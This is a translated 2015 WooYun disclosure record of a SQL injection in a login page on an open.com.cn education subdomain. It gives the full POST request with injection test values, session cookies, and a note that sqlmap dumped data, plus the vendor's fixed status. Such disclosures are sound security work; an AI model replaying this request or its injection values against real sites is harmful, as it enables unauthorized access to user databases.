Vulnerability summary

Defect ID: wooyun-2015-0145908

Title: SQL injection via the login page of an Aopeng Education (open.com.cn) main site

Vendor: open.com.cn

Author: 小菜牛牛

Submitted: 2015-10-11 23:12

Fixed: 2015-11-10 09:22

Published: 2015-11-10 09:22

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Fixed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-11: Details sent to the vendor; awaiting vendor response
2015-10-12: Vendor confirmed; details disclosed to the vendor only
2015-10-22: Details disclosed to core white hats and domain experts
2015-11-01: Details disclosed to ordinary white hats
2015-11-10: Vendor fixed the vulnerability and disclosed it proactively; details disclosed to the public

Summary:

Lately a lot of people have been digging for bugs in Aopeng Education's sites, so I am joining in.
http://hanbanoa.open.com.cn/Login.aspx
The username field of the login form leads to a POST-based SQL injection.

Detailed description:

POST /Login.aspx HTTP/1.1
Host: hanbanoa.open.com.cn
Proxy-Connection: keep-alive
Content-Length: 678
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://hanbanoa.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://hanbanoa.open.com.cn/Login.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: b_t_s_100004=16092781-5952-42a9-83c3-e608d3578e02; up_first_date=2015-08-30; up_beacon_user_id_100004= b_t_s_100200=594e3550-c7be-48bd-8282-a17e2003fc5c; b_t_s_100201=3da32262-bb9f-4e8c-ac0f-3db523e62d6d; b_t_s_100100=4cf0ee6e-8783-42f6-a373-90710386ad54; b_t_s_100103=5e87d33c-41e1-4110-9aa6-60914c0fa6cd; b_t_s=t241814798967x; up_beacon_user_id_100200= up_beacon_user_id_100201= __utma=238318431.22661185.1441815461.1441815461.1441816034.2; __utmz=238318431.1441816034.2.2.utmcsr=baidu|utmccn=(organic)|utmcmd=organic; b_t_s_100001=1e438e61-331b-4985-bf39-b9c606606dfe; Hm_lvt_e208d74b7fc93539fb0706a17abb4f67=1440906334,1441817766; b_t_s_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9; up_beacon_id_100204=9964c247-ca3d-4d72-8b51-c5a875d1b2a9-1444131812420; up_page_stime_100204=1444131822891; up_beacon_vist_count_100204=6; up_beacon_user_id_100204=; ASP.NET_SessionId=vtj5gpydldpvfmjfbv454brd
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTczODgwNjM5MQ9kFgICAw9kFgICBQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAmYPZBYCAgIPZBYCAgEPZBYCZg9kFgYCBQ88KwAGAQAPFgIeBVZhbHVlBRNhZG1pbicgb3IgJzEnPScxJy0tZGQCCQ88KwAGAQAPFgIfAAUTYWRtaW4nIG9yICcxJz0nMSctLWRkAg0PPCsABgEADxYCHwAFBjgyNjk4MmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRhBU1B4Um91bmRQYW5lbDEkYnRuTG9naW5zFWDeXnnQ5XXoLF6fIC0XK63B3SBx14EauQvnZPKvHw%3D%3D&ASPxRoundPanel1_tbLoginName_Raw=1%27&ASPxRoundPanel1%24tbLoginName=1%27&ASPxRoundPanel1%24tbPassword=1%27&ASPxRoundPanel1_txtCheckCode_Raw=370436&ASPxRoundPanel1%24txtCheckCode=370436&ASPxRoundPanel1%24btnLogin=&DXScript=1_145%2C1_81%2C1_99%2C1_106%2C1_137%2C1_92


Running sqlmap against this request dumps plenty of data.

[screenshot: QQ截图20151010224249.jpg]

[screenshot: QQ截图20151010224310.jpg]

[screenshot: QQ截图20151010224327.jpg]


Proof of vulnerability:

(Same request and sqlmap screenshots as in the detailed description above.)

Suggested fix:

You are more professional at this than I am.

Copyright notice: please credit the source when reposting: 小菜牛牛@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability rank: 3

Confirmed at: 2015-10-12 10:19

Vendor reply:

Externally exposed test environment

Latest status:

2015-11-10: Fixed